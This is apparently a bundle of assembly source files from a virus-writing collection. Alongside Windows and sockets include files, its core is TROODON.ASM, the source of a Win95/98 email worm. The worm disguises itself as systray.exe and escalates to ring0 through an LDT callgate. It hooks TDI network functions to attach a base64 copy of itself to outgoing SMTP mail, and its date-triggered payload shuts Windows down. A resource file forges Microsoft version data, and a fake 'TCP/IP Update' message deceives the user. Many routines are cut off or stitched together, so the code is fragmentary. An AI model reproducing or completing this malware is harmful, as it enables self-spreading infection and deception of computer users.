IFNDEF NOWIN31
IFNDEF NOWINMESSAGES
IFNDEF NOSYSMETRICS
; GetSystemMetrics() codes
SM_CXSCREEN = 0
SM_CYSCREEN = 1
SM_CXVSCROLL = 2
SM_CYHSCROLL = 3
SM_CYCAPTION = 4
SM_CXBORDER = 5
SM_CYBORDER = 6
SM_CXDLGFRAME = 7
SM_CYDLGFRAME = 8
SM_CYVTHUMB = 9
SM_CXHTHUMB = 10
SM_CXICON = 11
SM_CYICON = 12
SM_CXCURSOR = 13
SM_CYCURSOR = 14
SM_CYMENU = 15
SM_CXFULLSCREEN = 16
SM_CYFULLSCREEN = 17
SM_CYKANJIWINDOW = 18
SM_MOUSEPRESENT = 19
SM_CYVSCROLL = 20
SM_CXHSCROLL = 21
SM_DEBUG = 22
SM_SWAPBUTTON = 23
SM_RESERVED1 = 24
SM_RESERVED2 = 25
SM_RESERVED3 = 26
SM_RESERVED4 = 27
SM_CXMIN = 28
SM_CYMIN = 29
SM_CXSIZE = 30
SM_CYSIZE = 31
SM_CXFRAME = 32
SM_CYFRAME = 33
SM_CXMINTRACK = 34
SM_CYMINTRACK = 35
IFNDEF NOWIN31
SM_CXDOUBLECLK = 36
SM_CYDOUBLECLK = 37
SM_CXICONSPACING = 38
SM_CYICONSPACING = 39
SM_MENUDROPALIGNMENT = 40
SM_PENWINDOWS = 41
SM_DBCSENABLED = 42
ENDIF
SM_CMETRICSMAX = 43
ENDIF ;NOSYSMETRICS
IFNDEF NOCOLOR
COLOR_SCROLLBAR = 0
COLOR_BACKGROUND = 1
COLOR_ACTIVECAPTION = 2
COLOR_INACTIVECAPTION = 3
COLOR_MENU = 4
COLOR_WINDOW = 5
COLOR_WINDOWFRAME = 6
COLOR_MENUTEXT = 7
COLOR_WINDOWTEXT = 8
COLOR_CAPTIONTEXT = 9
COLOR_ACTIVEBORDER = 10
COLOR_INACTIVEBORDER = 11
COLOR_APPWORKSPACE = 12
COLOR_HIGHLIGHT = 13
COLOR_HIGHLIGHTTEXT = 14
COLOR_BTNFACE = 15
COLOR_BTNSHADOW = 16
COLOR_GRAYTEXT = 17
COLOR_BTNTEXT = 18
IFNDEF NOWIN31
COLOR_INACTIVECAPTIONTEXT = 19
COLOR_BTNHILIGHT = 20
ENDIF
ENDIF ;NOCOLOR
IFNDEF NOCOMM
NOPARITY = 0
ODDPARITY = 1
EVENPARITY = 2
MARKPARITY = 3
SPACEPARITY = 4
ONESTOPBIT = 0
ONE5STOPBITS = 1
TWOSTOPBITS = 2
; Error Flags
CE_RXOVER = 0001h ; /* Receive Queue overflow */
CE_OVERRUN = 0002h ; /* Receive Overrun Error */
CE_RXPARITY = 0004h ; /* Receive Parity Error */
CE_FRAME = 0008h ; /* Receive Framing error */
CE_BREAK = 0010h ; /* Break Detected */
CE_CTSTO = 0020h ; /* CTS Timeout */
CE_DSRTO = 0040h ; /* DSR Timeout */
CE_RLSDTO = 0080h ; /* RLSD Timeout */
CE_TXFULL = 0100h ; /* TX Queue is full */
CE_PTO = 0200h ; /* LPTx Timeout */
CE_IOE = 0400h ; /* LPTx I/O Error */
CE_DNS = 0800h ; /* LPTx Device not selected */
CE_OOP = 1000h ; /* LPTx Out-Of-Paper */
CE_MODE = 8000h ; /* Requested mode unsupported */
; Events
EV_RXCHAR = 0001h ; /* Any Character received */
EV_RXFLAG = 0002h ; /* Received certain character */
EV_TXEMPTY = 0004h ; /* Transmitt Queue Empty */
EV_CTS = 0008h ; /* CTS changed state */
EV_DSR = 0010h ; /* DSR changed state */
EV_RLSD = 0020h ; /* RLSD changed state */
EV_BREAK = 0040h ; /* BREAK received */
EV_ERR = 0080h ; /* Line status error occurred */
EV_RING = 0100h ; /* Ring signal detected */
EV_PERR = 0200h ; /* Printer error occured */
EV_CTSS = 0400h ; /* CTS state */
EV_DSRS = 0800h ; /* DSR state */
EV_RLSDS = 1000h ; /* RLSD state */
EV_RingTe = 2000h ; /* Ring Trailing Edge Indicator */
; Escape Functions
SETXOFF = 1 ; /* Simulate XOFF received */
SETXON = 2 ; /* Simulate XON received */
SETRTS = 3 ; /* Set RTS high */
CLRRTS = 4 ; /* Set RTS low */
SETDTR = 5 ; /* Set DTR high */
CLRDTR = 6 ; /* Set DTR low */
RESETDEV = 7 ; /* Reset device if possible */
IFNDEF NOWIN31
; new escape functions
GETMAXLPT equ 8 ; Max supported LPT id
GETMAXCOM equ 9 ; Max supported COM id
GETBASEIRQ equ 10 ; Get port base & irq for a port
ENDIF
DCB struc
DCB_Id db ? ; /* Internal Device ID */
DCB_BaudRate dw ? ; /* Baudrate at which runing */
DCB_ByteSize db ? ; /* Number of bits/byte, 4-8 */
DCB_Parity db ? ; /* 0-4=None,Odd,Even,Mark,Space */
DCB_StopBits db ? ; /* 0,1,2 = 1, 1.5, 2 */
DCB_RlsTimeout dw ? ; /* Timeout for RLSD to be set */
DCB_CtsTimeout dw ? ; /* Timeout for CTS to be set */
DCB_DsrTimeout dw ? ; /* Timeout for DSR to be set */
DCB_BitMask1 db ?
DCB_BitMask2 db ?
COMSTAT struc
COMS_BitMask1 db ?
ENDIF ;NOCOM
;
; Installable Driver Support
;
; Driver Messages
DRV_LOAD = 0001h
DRV_ENABLE = 0002h
DRV_OPEN = 0003h
DRV_CLOSE = 0004h
DRV_DISABLE = 0005h
DRV_FREE = 0006h
DRV_CONFIGURE = 0007h
DRV_QUERYCONFIGURE = 0008h
DRV_INSTALL = 0009h
DRV_REMOVE = 000Ah
DRV_EXITSESSION = 000Bh
DRV_POWER = 000Fh
DRV_RESERVED = 0800h
DRV_USER = 4000h
DRVCNF_CANCEL = 0000h
DRVCNF_OK = 0001h
DRVCNF_RESTART = 0002h
IFNDEF NOKERNEL
;
; Common Kernel errors
;
ERR_GALLOC = 01030h ; GlobalAlloc Failed
ERR_GREALLOC = 01031h ; GlobalReAlloc Failed
ERR_GLOCK = 01032h ; GlobalLock Failed
ERR_LALLOC = 01033h ; LocalAlloc Failed
ERR_LREALLOC = 01034h ; LocalReAlloc Failed
ERR_LLOCK = 01035h ; LocalLock Failed
ERR_ALLOCRES = 01036h ; AllocResource Failed
ERR_LOCKRES = 01037h ; LockResource Failed
ERR_LOADMODULE = 01038h ; LoadModule failed
;
; Common User Errors
;
ERR_CREATEDLG = 01045h ; /* Create Dlg failure due to LoadMenu failure */
ERR_CREATEDLG2 = 01046h ; /* Create Dlg failure due to CreateWindow Failure */
ERR_REGISTERCLASS = 01047h ; /* RegisterClass failure due to Class already registered */
ERR_DCBUSY = 01048h ; /* DC Cache is full */
ERR_CREATEWND = 01049h ; /* Create Wnd failed due to class not found */
ERR_STRUCEXTRA = 01050h ; /* Unallocated Extra space is used */
ERR_LOADSTR = 01051h ; /* LoadString() failed */
ERR_LOADMENU = 01052h ; /* LoadMenu Failed */
ERR_NESTEDBEGINPAINT = 01053h ; /* Nested BeginPaint() calls */
ERR_BADINDEX = 01054h ; /* Bad index to Get/Set Class/Window Word/Long */
ERR_CREATEMENU = 01055h ; /* Error creating menu */
;
; Common GDI Errors
;
ERR_CREATEDC = 01070h ; /* CreateDC/CreateIC etc., failure */
ERR_CREATEMETA = 01071h ; /* CreateMetafile failure */
ERR_DELOBJSELECTED = 01072h ; /* Bitmap being deleted is selected into DC */
ERR_SELBITMAP = 01073h ; /* Bitmap being selected is already selected elsewhere */
ENDIF ;NOKERNEL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDOWS.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ
;
; WSocks.inc: include file for windows sockets .
; Designed for TASM5 and Win32.
;
; (C) 1999 Bumblebee.
;
; This file contains basic structures and stuff to work
; with windows sockets.
;
; closes a socket
; socket descriptor
;
extrn closesocket:PROC
; sends data (this socks are a shit... Unix uses simple write)
; flags (1 OOB data or 0 normal ) , length, addr of buffer, socket
; returns: caracters sent or SOCKET_ERR on error
extrn send:PROC
; reveives data (this socks are a shit... Unix uses simple read)
; flags (use 0), length, addr of buffer, socket
; returns: caracters sent or SOCKET_ERR on error
extrn recv:PROC
; connects to a server
; sizeof struct SOCKADDR, struct SOCKADDR, socket
; returns: SOCKET_ERR on error
extrn connect:PROC
; types of sockets
SOCK_STREAM equ 1 ; stream (connection oriented; telnet like)
SOCK_DGRAM equ 2 ; datagram (packets, packets, packets)
; protocol
PCL_NONE equ 0 ; none (define the protocol not needed)
11 ICON "icecubes.ico"
EDITTEXT IDC_EDIT3,75,35,34,12,ES_AUTOHSCROLL
CONTROL "Spin1",IDC_SPIN1,"msctls_updown32",UDS_ARROWKEYS,108,35,
8,12
EDITTEXT IDC_EDIT1,75,53,43,13,ES_AUTOHSCROLL
LTEXT "bytes of un-saved changes",IDC_STATIC,130,55,94,13
EDITTEXT IDC_EDIT2,100,128,18,12,ES_AUTOHSCROLL
PUSHBUTTON "Cancel",IDC_BUTTON1,122,233,50,12
DEFPUSHBUTTON "Ok",IDC_BUTTON2,64,233,50,12
END
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ICECUBES.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.ASM]ÄÄÄ
; I-Worm.Win9X.Troodon Project
;-----------------------------------------
; Technical details:
; This is an Win95/98 specific Internet-Worm, witch spreads trough e-mail.
; When executed it does more things in ring3 and ring0 too.
; - ring3 actions -
; - it looks very similar with a normal Windows application witch has a window etc.
; So it has a window and a message loop. This is needed by the payload witch will
activate
; on a specific date (check code). When payload is triggered the foreground window on
the desktop
; will start bounce arround on the screen, for 30 seconds then Windows will shutdown.
; This is the payload part, it will activate only if it is running under the name
"systray.exe"
; - when starting it checks if already installed in the system: checks if it's name is
"systray.exe".
; If not, then it copies itself in System directory under the name "systray.me", by
using wininit.ini
; systray.exe will be replaced by systray.me on next startup, and original systray.exe
will be saved
; in systray.sys.
; If the name isn't systray.exe then it will show a message to fool the user all is ok.
; If the name is systray.exe then it will run the saved systray.sys using WinExec and
it will assume
; that it is already installed in the system.
; - it will encoded current process'es file in base64 and save it in memory allocated
with VirtualAlloc
; - it will check for signature in memory at 0xC000E990
; If not in memory then it will jump into ring0 by using a callgate method described
by Zombie,
; by patching LDT table.
;
; - ring0 actions -
; - it allocates memory in ring0 for it's own code and for encoded file.
; - it copies itself and the encoded file in there (after jumping back into ring3 the
memory used for
; encoded file will be free.
; - it will hook TdiConnect, TdiSend, TdiCloseConnection, TdiDisconnect for it's own
use.
; - it will monitor all outgoing connections checking for SMTP (port 25) connections.
; - when it find one it will wait for DATA command for SMTP server
; - then it will check the content of the e-mail, if it is a MIME formated e-mail
containing
; text/plain or text/html or both it will modify the message attaching it's own code
(encoded in base64)
; to the mail.
;
; It has it's own string routines.
; Things I didn't do in this version are: doesn't attach to mails that already have
attachements, and to mails
; with no MIME content.
;
;
; This is done using NASM syntax.
; Compilation and linking:
; NASMW -f win32 v.asm
; GORC /r vres.rc
; ALINK -entry start -oPE v.obj vres.res kernel32.lib user32.lib gdi32.lib
extern ExitProcess
extern RegisterServiceProcess
extern GetModuleHandleA
extern GetModuleFileNameA
extern CopyFileA
extern DeleteFileA
extern WritePrivateProfileStringA
extern WinExec
extern VirtualAlloc
extern VirtualFree
extern CreateFileA
extern GetFileSize
extern CloseHandle
extern CreateFileMappingA
extern MapViewOfFile
extern UnmapViewOfFile
extern MessageBoxA
extern GetForegroundWindow
extern GetWindowRect
extern MoveWindow
extern RegisterClassA
extern CreateWindowExA
extern ShowWindow
extern UpdateWindow
extern GetMessageA
extern TranslateMessage
extern DispatchMessageA
extern PostQuitMessage
extern DefWindowProcA
extern SetTimer
extern GetLocalTime
extern ExitWindowsEx
extern GetSystemDirectoryA
extern lstrcatA
%include "win32n.inc"
%include "vxdn.inc"
global start
[bits 32]
[section .text]
start:
%define ebp_hInstance ebp+8 ; handle of current instance
%define ebp_hPrevInstance ebp+0ch ; handle of previous instance
%define ebp_lpszCmdLine ebp+10h ; pointer to command line
%define ebp_nCmdShow ebp+14h ; show state of window
push ebp
mov ebp,esp
test eax,eax
jnz .Success
.Success:
test eax,eax
jnz .Success
push eax
call UpdateWindow
jmp MsgLoop
WndProc:
%define ebp_hWnd ebp+8 ; handle of window
%define ebp_Msg ebp+0ch ; message
%define ebp_wParam ebp+10h ; first message parameter
%define ebp_lParam ebp+14h ; second message parameter
%define ebp_DC ebp-4
push ebp
mov ebp,esp
.DefMsgHandler:
push dword [ebp_lParam]
push dword [ebp_wParam]
push dword [ebp_Msg]
push dword [ebp_hWnd]
call DefWindowProcA
Create_Handler:
; check if the name of the file is "systray.exe"
call check_systray
; Get out
push dword 0
call ExitProcess
.next_1: ; next is for payload
cmp word [STime+SYSTEMTIME.wDayOfWeek], 6
jne .exit
push dword 0
push dword 1
push dword ID_TIMER1
push dword [ebp_hWnd]
call SetTimer
push dword 0
push dword 300000
push dword ID_TIMER2
push dword [ebp_hWnd]
call SetTimer
Timer_Handle:
; this is for payload again
cmp dword [ebp_wParam], ID_TIMER1
jnz .next_1
jmp .timer_1
.next_1: cmp dword [ebp_wParam], ID_TIMER2
jnz .next_2
jmp .timer_2
.next_2: jmp WndProc.Exit
; "Restore" window
push dword SW_RESTORE
push eax
call ShowWindow
; move it
push dword 1
mov eax, [rect+RECT.bottom]
sub eax, [rect+RECT.top]
push eax
mov eax, [rect+RECT.right]
sub eax, [rect+RECT.left]
push eax
mov eax, [rect+RECT.top]
add eax, [y]
push eax
mov eax, [rect+RECT.left]
add eax, [x]
push eax
push dword [hWnd]
call MoveWindow
jmp WndProc.Exit
Destroy_Handler:
push dword 0
call PostQuitMessage
jmp WndProc.Exit
jmp WndProc.DefMsgHandler
;------------------------------------------------------------
; Here starts the part witch makes this an I-Worm
;------------------------------------------------------------
iworm: pushad
.systray_over:
; signature
mov eax, 0xC000E990 ; check if already there
cmp dword [eax], 'WORM'
;------------------------------------------------------------
; Ring0Proc
;------------------------------------------------------------
Ring0Proc pushf
pushad
; copy it there
mov esi, dword [encoded_addr]
mov edi, eax
mov ecx, dword [encoded_size]
repz movsb
;------------------------------------------------------------
; This code will be executed only in heap
;------------------------------------------------------------
heap_code: pushf
pushad
popad
popf
ret
;------------------------------------------------------------
; TdiHook
;------------------------------------------------------------
TdiHook: ; now i need to hook the TDI functions i need
pushad
.exit: popad
ret
;------------------------------------------------------------
; TdiConnect_Hook
;------------------------------------------------------------
TdiConnect_Hook:; MOV EDI, <address_of_code_in_heap>
db 0xBF
TdiConnect_Delta:dd 0
sub edi, start
push ebp
mov ebp, esp
pushf
pushad
TdiConnect_Hook_Jmp:
popad
popf
pop ebp
; jmp [TdiConnect_Jmp]
db 0xFF, 0x25
TdiConnect_Jmp: dd 0
;------------------------------------------------------------
; TdiSend_Hook
;------------------------------------------------------------
TdiSend_Hook:
push ebp
mov ebp, esp
pushf
pushad
jmp .exit
.not_found_1:
jmp .exit
.found_1: mov [edi + mark1], esi ; save the position of "Content-Type" witch is the
begin of the text mail
call strncmpi
test eax, eax
jne .not_textplain
mov byte [edi + mailtype], 1 ; text/plain
jmp .go_for_it
.not_textplain:
lea edx, [edi + strMultipartAlternative]
push esi
push edx
pop esi
call strlen
push eax
pop ecx
pop esi
call strncmpi
test eax, eax
jne .not_multipartalternative
mov byte [edi + mailtype], 2 ; text/plain + text/html
jmp .go_for_it
.not_multipartalternative:
lea edx, [edi + strMultipartMixed]
push esi
push edx
pop esi
call strlen
push eax
pop ecx
pop esi
call strncmpi
test eax, eax
jne .not_multipartmixed
mov byte [edi + mailtype], 3 ; text + probably attachement
; jmp .go_for_it
.not_multipartmixed:
jmp .exit
.go_for_it: ; EIP reached here if the e-mail is text/plain
; find the end of mail and save it
mov esi, [edi + sourcebuf]
.again_1: cmp byte [esi], 0
je .found_2
inc esi
jmp .again_1
.found_2: mov [edi + mark2], esi
; close boundary
lea esi, [edi + myEndBoundary]
call strlen
mov ecx, eax
call strncpy
.exit: popad
popf
pop ebp
; jmp [TdiSend_Jmp]
db 0xFF, 0x25
TdiSend_Jmp dd 0
;------------------------------------------------------------
; TdiDisconnect_Hook
;------------------------------------------------------------
TdiDisconnect_Hook:
push ebp
mov ebp, esp
pushf
pushad
.exit: popad
popf
pop ebp
; jmp [TdiDisconnect_Jmp]
db 0xFF, 0x25
TdiDisconnect_Jmp:dd 0
;------------------------------------------------------------
; TdiCloseConnection_Hook
;------------------------------------------------------------
TdiCloseConnection_Hook:
push ebp
mov ebp, esp
pushf
pushad
.exit: popad
popf
pop ebp
; jmp [TdiCloseConnection_Jmp]
db 0xFF, 0x25
TdiCloseConnection_Jmp:
dd 0
;------------------------------------------------------------
; String comparation non case sensitive
;------------------------------------------------------------
; Params:
; ESI = source
; EDX = destination
; ECX = length
; Return:
; EAX = 0 if strings match
; EAX = 1 if not match
;------------------------------------------------------------
strncmpi: pushf
pushad
.done_with_1:
; if Caps Lock the make it non Caps
cmp al, 0x41 ; 'A'
jge .great_then_A_2
jmp .done
.great_then_A_2:
cmp al, 0x5A ; 'Z'
jbe .less_then_Z_2
jmp .done
.less_then_Z_2:
add al, 0x20
inc esi
inc edx
loop .loop
;------------------------------------------------------------
; String length
;------------------------------------------------------------
; Params:
; ESI = source
; Return:
; EAX = length
;------------------------------------------------------------
strlen: push ebx
push ecx
push edx
push esi
push edi
push ebp
pop ebp
pop edi
pop esi
pop edx
pop ecx
pop ebx
ret
;------------------------------------------------------------
; String copy (length specified)
;------------------------------------------------------------
; Params:
; ESI = source
; EDX = destination
; ECX = length
;------------------------------------------------------------
strncpy: pushf
pushad
cld
mov edi, edx
repz movsb
.exit: popad
popf
ret
;------------------------------------------------------------
; Encode in base64 the file
;------------------------------------------------------------
; Params:
; ESI = source filename
; Return:
; EAX = address of encoded buffer
; ECX = size of encoded file
;------------------------------------------------------------
encode: pushad
; open file
push dword 0
push dword 0
push dword 3
push dword 0
push dword 1
push dword 0xC0000000 ; GENERIC_READ | GENERIC_WRITE
push esi
call CreateFileA
mov dword [hFile], eax
inc eax
mov bx, word [eax]
xchg bl, bh
shr bx, 6
mov bh, 0
and bl, 00111111b
mov bh, byte [edi + ebx]
mov byte [edx + esi], bh
inc esi
inc eax
xor ebx, ebx
mov bl, byte [eax]
and bl, 00111111b
mov bh, byte [edi + ebx]
mov byte [edx + esi], bh
inc esi
inc eax
sub ecx, 3
cmp ecx, 0
jne .loop
popad
mov eax, dword [encoded_addr]
mov ecx, dword [encoded_size]
ret
;------------------------------------------------------------
; Close encode (free allocated memory)
;------------------------------------------------------------
close_encode: pushad
push dword [encoded_addr]
push dword 0x00000000
push dword 0x00008000
call VirtualFree
popad
ret
;------------------------------------------------------------
; Ring 0 Callgate
;------------------------------------------------------------
CGS equ 8
callgate: pushad
push ebx
sgdt [esp - 0x02]
pop ebx
xor eax, eax
sldt ax
and al, 0xF8
popad
ret
;------------------------------------------------------------
; Check if systray
;------------------------------------------------------------
check_systray:
pushad
.systray_again:
call strncmpi
dec ebx
test ebx, ebx
je .not_systray
inc esi
test eax, eax
jne .systray_again
jmp .systray
.not_systray:
popad
mov byte [systray_ornot], 0
ret
.systray: popad
mov byte [systray_ornot], 1
ret
;------------------------------------------------------------
; Make paths for use in installation etc.
;------------------------------------------------------------
make_paths: pushad
push dword 260
push dword systray.exe
call GetSystemDirectoryA
popad
ret
;beep: pushad
; mov ax, 1000
; mov bx, 200
; mov cx, ax
; mov al, 0xB6
; out 0x43, al
; mov dx, 0x0012
; mov ax, 0x34DC
; div cx
; out 0x42, al
; mov al, ah
; out 0x42, al
; in al, 0x61
; mov ah, al
; or al, 0x03
; out 0x61, al
;l1: mov ecx, 4680
;l2: loop l2
; dec bx
; jnz l1
; mov al, ah
; out 0x61, al
;
; popad
; ret
[section .data]
my_path times 300 db 0
path_len dd 300
systray.exe times 260 db 0
systray.exe_ db '\systray.exe', 0
systray.sys times 260 db 0
systray.sys_ db '\systray.sys', 0
systray.me times 260 db 0
systray.me_ db '\systray.me', 0
wininit.ini db 'wininit.ini', 0
rename db 'Rename', 0
systray_exe db 'SYSTRAY.EXE', 0
systray_exe_len dd 11 ; size of the string above
tempFileName db '\systray.tmp', 0
systray_ornot db 0 ; 0 - "myself" isn't systray.exe :)
; 1 - "myself" is systray.exe :)
msgCaption db 'Windows TCP/IP Update', 0
msgContent db "The system doesn't need an update.", 13, 10
db 'Latest version of TCP/IP already present.', 0
hFile dd 0
hMap dd 0
pMap dd 0
dwFileSize dd 0
dwBufSize dd 0
encoded_addr dd 0
heap_enc_addr dd 0
encoded_size dd 0
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
pad db '='
pad_no dd 0
mailtype db 0
codeaddr dd 0
codesize dd 0
TCPName db 'MSTCP', 0
TdiDispatchTable dd 0
TdiConnect_PrevAddr dd 0
TdiSend_PrevAddr dd 0
TdiDisconnect_PrevAddr dd 0
TdiCloseConnection_PrevAddr dd 0
TraceHandle dd 0
NextIsMail db 0
sourcebuf dd 0
buflen dd 0
search_str db 'DATA', 0x0D, 0x0A, 0
newmailaddr dd 0
;newmaillen dd 0
strContentType db 'Content-Type:', 0
strMultipartAlternative db 'multipart/alternative', 0
strMultipartMixed db 'multipart/mixed', 0
strTextPlain db 'text/plain', 0
strTextHtml db 'text/html', 0
strApp db 'application/x-msdownload', 0
mark1 dd 0
mark2 dd 0
hWnd dd 0
WindowHandle dd 0
ClassName db 'I-Worm', 0
WindowTitle db 'Troodon', 0
x dd step
y dd step
rect: ISTRUC RECT
at RECT.left, dd 0
at RECT.top, dd 0
at RECT.right, dd 0
at RECT.bottom, dd 0
IEND
WindowClassStruc:
ISTRUC WNDCLASS
at WNDCLASS.style, dd 0
at WNDCLASS.lpfnWndProc, dd WndProc
at WNDCLASS.cbClsExtra, dd 0
at WNDCLASS.cbWndExtra, dd 0
at WNDCLASS.hInstance, dd 0
at WNDCLASS.hIcon, dd NULL
at WNDCLASS.hCursor, dd NULL
at WNDCLASS.hbrBackground, dd 1
at WNDCLASS.lpszMenuName, dd NULL
at WNDCLASS.lpszClassName, dd ClassName
IEND
WindowMSG:
ISTRUC MSG
at MSG.hwnd, dd 0
at MSG.message, dd 0
at MSG.wParam, dd 0
at MSG.lParam, dd 0
at MSG.time, dd 0
IEND
STime:
ISTRUC SYSTEMTIME
at SYSTEMTIME.wYear, dw 0
at SYSTEMTIME.wMonth, dw 0
at SYSTEMTIME.wDayOfWeek, dw 0
at SYSTEMTIME.wDay, dw 0
at SYSTEMTIME.wHour, dw 0
at SYSTEMTIME.wMinute, dw 0
at SYSTEMTIME.wSecond, dw 0
at SYSTEMTIME.wMilliseconds, dw 0
IEND
end:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.RC]ÄÄÄ
#define IDI_ICON 100
IDI_ICON ICON <v.ico>
1 VERSIONINFO
FILEVERSION 1,0,0,0
PRODUCTVERSION 1,0,0,0
FILEFLAGSMASK 0x0000003FL
FILEFLAGS 0x0000000BL
FILEOS 0x00010001L
FILETYPE 0x00000001L
FILESUBTYPE 0x00000000L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040904E4"
BEGIN
VALUE "FileDescription","TCP/IP Update for Microsoft Windows 95/98\0"
VALUE "FileVersion", "6.6.6\0"
VALUE "LegalCopyright", "Copyright (C) Microsoft Corp. 1999-2000\0"
VALUE "CompanyName", "Microsoft Corporation\0"
VALUE "InternalName","TCPIPUPD\0"
VALUE "OriginalFilename", "TCPIPUPD.EXE\0"
VALUE "ProductName","Microsoft(R) Windows NT(R) Operating System\0"
VALUE "ProductVersion", "6.6.6\0"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x0409,1252
END
END
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[TROODON.RC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN32N.INC]ÄÄÄ
; Win32.inc for NASM 1999 version 0.06 by Tamas Kaproncai [tomcat@szif.hu]
;-----------------------------data types----------------------------------
%define ACHAR BYTE ;ansi character
%define ATOM DWORD ;string atom
%define BOOL DWORD ;boolean variable
%define COLORREF DWORD ;rgb color
%define DWORDLONG QWORD ;long double word
%define GLOBALHANDLE DWORD ;global handle
%define HACCEL DWORD ;accelerator handle
%define HANDLE DWORD ;unspecified handle
%define HBITMAP DWORD ;bitmap handle
%define HBRUSH DWORD ;brush handle
%define HCOLORSPACE DWORD ;color space handle
%define HCURSOR DWORD ;cursor handle
%define HDC DWORD ;device context handle
%define HDWP DWORD ;defer win pos handle
%define HENHMETAFILE DWORD ;enh. metafile handle
%define HFILE DWORD ;file handle
%define HFONT DWORD ;font handle
%define HGLOBAL DWORD ;global handle
%define HHOOK DWORD ;hook handle
%define HICON DWORD ;icon handle
%define HINSTANCE DWORD ;instance handle
%define HINTERNET DWORD ;internet handle
%define HLOCAL DWORD ;local handle
%define HMENU DWORD ;menu handle
%define HMETAFILE DWORD ;metafile handle
%define HPALETTE DWORD ;palette handle
%define HPEN DWORD ;pen handle
%define HRGN DWORD ;region handle
%define HRSRC DWORD ;resource handle
%define HSTR DWORD ;string handle
%define HTASK DWORD ;task handle
%define HTREEITEM DWORD ;tree view item handle
%define HWND DWORD ;window handle
%define INTEGER DWORD ;standard integer
%define LOCALHANDLE DWORD ;local handle
%define LONG DWORD ;long integer
%define LONGINT DWORD ;long integer
%define LPARAM DWORD ;long parameter
%define LPBOOL DWORD ;long ptr to boolean
%define LPBYTE DWORD ;long ptr to byte
%define LPCSTR DWORD ;long ptr to string
%define LPCTSTR DWORD ;long ptr to string
%define LPCVOID DWORD ;long ptr to buffer
%define LPDWORD DWORD ;long ptr to dword
%define LPFN DWORD ;long ptr to function
%define LPINT DWORD ;long ptr to integer
%define LPLONG DWORD ;long ptr to long int
%define LPMSG DWORD ;long pointer to message
%define LPPAINTSTRUCT DWORD ;long pointer to paint structure
%define LPRECT DWORD ;long pointer to rectangle
%define LPSTR DWORD ;long ptr to string
%define LPTSTR DWORD ;long ptr to string
%define LPVOID DWORD ;long ptr to buffer
%define LPWORD DWORD ;long ptr to word
%define LRESULT DWORD ;long result
%define POINTER DWORD ;pointer to anything
%define PVOID DWORD ;pointer to buffer
%define SHORTINT WORD ;short integer
%define UINT DWORD ;unsigned integer
%define WCHAR WORD ;unicode character
%define WNDPROC DWORD ;window procedure
%define WPARAM DWORD ;word parameter
;-------------------------WindowProc macros-------------------------------
%MACRO StartWindowProc 0
PUSH EBP
MOV EBP,ESP
%DEFINE hwnd EBP+8
%DEFINE uMsg EBP+12
%DEFINE wParam EBP+16
%DEFINE lParam EBP+20
%ENDMACRO
%MACRO EndWindowProc 0
POP EBP
RETN 16
%ENDMACRO
;-------------------------win32api equates-------------------------------
WINAPI equ 1
TRUE equ 1
FALSE equ 0
NULL equ 0
Normal equ 000000h
ReadOnly equ 000001h
Hidden equ 000010h
System equ 000100h
vLabel equ 001000h
SubDir equ 010000h
Archive equ 100000h
Black equ 000000h
Blue equ 0FF0000h
Green equ 00FF00h
Cyan equ 0FFFF00h
Red equ 0000FFh
Magenta equ 0FF00FFh
Yellow equ 00FFFFh
White equ 0FFFFFFh
Gray equ 080808h
ANYSIZE_ARRAY equ 1
INVALID_HANDLE_VALUE equ -1
DELETE equ 10000h
READ_CONTROL equ 20000h
WRITE_DAC equ 40000h
WRITE_OWNER equ 80000h
SYNCHRONIZE equ 100000h
STANDARD_RIGHTS_READ equ READ_CONTROL
STANDARD_RIGHTS_WRITE equ READ_CONTROL
STANDARD_RIGHTS_EXECUTE equ READ_CONTROL
STANDARD_RIGHTS_REQUIRED equ 0F0000h
STANDARD_RIGHTS_ALL equ 1F0000h
SPECIFIC_RIGHTS_ALL equ 0FFFFh
SID_REVISION equ 1
SID_MAX_SUB_AUTHORITIES equ 15
SID_RECOMMENDED_SUB_AUTHORITIES equ 1
SidTypeUser equ 1
SidTypeGroup equ 2
SidTypeDomain equ 3
SidTypeAlias equ 4
SidTypeWellKnownGroup equ 5
SidTypeDeletedAccount equ 6
SidTypeInvalid equ 7
SidTypeUnknown equ 8
